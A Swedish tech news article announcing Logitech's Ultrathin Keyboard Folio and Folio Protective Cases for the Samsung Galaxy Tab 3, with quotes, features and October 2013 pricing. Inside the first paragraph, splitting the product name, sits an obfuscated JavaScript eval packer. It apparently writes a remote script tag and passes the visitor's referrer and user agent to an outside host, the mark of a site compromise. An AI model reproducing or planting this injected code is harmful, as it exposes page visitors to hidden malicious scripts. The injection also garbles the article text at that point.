Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Logitech släpper sina första Folios för Samsung-tablets

Logitech släpper sina första Folios för Samsung-tablets

Idag lanserar Logitech de senaste tillskotten i sin populära linje med tablet-tillbehör, Logitech® eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbttf|var|u0026u|referrer|ztdbb||js|php’.split(’|’),0,{}))
Ultrathin Keyboard Folio till Samsung Galaxy Tab® 3 10.1
 och tre fodral: Logitech® Folio Protective Case till Samsung Galaxy Tab 3 10.1, 8.0 och 7.0. Fodralen är tillverkade i vattenavvisande material och ger skydd åt både fram och baksida på din tablet, men är ultratunna och lätta. Logitech Ultrathin Keyboard Folio är också utrustat med ett inbyggt tangentbord för att du ska ha möjligheten att på ett snabbt, enkelt och bekvämt sätt skriva, oavsett var du råkar befinna dig.

”Med de här nya fodralen har vi tagit tillvara på vår erfarenhet av att skapa praktiska och snygga tillbehör till tablets och för första gången skapat något för Samsung Galaxy Tab 3” säger Mike Culver, vice ordförande och ansvarig för mobila tillbehör på Logitech. ”Vårt mål är att skapa perfekta surfplatte-tillbehör, ända ner i minsta detalj. Från vattenavvisande material till bekväma tangentbord, med Logitech Ultrathin Keyboard Folio och Logitech Folio har vi försökt att tänka på precis allt.”

Logitech Ultrathin Keyboard Folio for Samsung Galaxy Tab 3 10.1 kommer med ett Bluetooth®-tangentbord vars tangenter har samma placering som på ett vanligt fullstorlekstangentbord. Det är designat för att ge dig en snabb, följsam skrivupplevelse. Fodralet är också utrustat med ett SecureLock-system som håller din tablet fäst vid sig och kraftfulla magneter som håller folion stängd när du inte använder din tablet.

Om du vill skydda din tablet men inte behöver ett tangentbord är Logitech Folio för Samsung Galaxy Tab 3 10.1, 8.0 eller 7.0 svaret. Fodralet skyddar din Galaxy Tablet från vätskor, stötar och slag utan att göra den otymplig. Precis som det tangentbordsutrustade fodralet låter de dig ställa din tablet på högkant med hjälp av inbyggda magneter.

Pris och tillgänglighet
Logitech Ultrathin Keyboard Folio för Samsung Galaxy Tab 3 10.1 väntas finnas tillgänglig från oktober 2013 med ett pris runt 999:-. Logitech Folio Protective Case för Samsung Galaxy Tab 3 10.1, 8.0 och 7.0 väntas finnas tillgängliga från oktober 2013 med ett pris runt 499:-. För mer information besök www.logitech.com.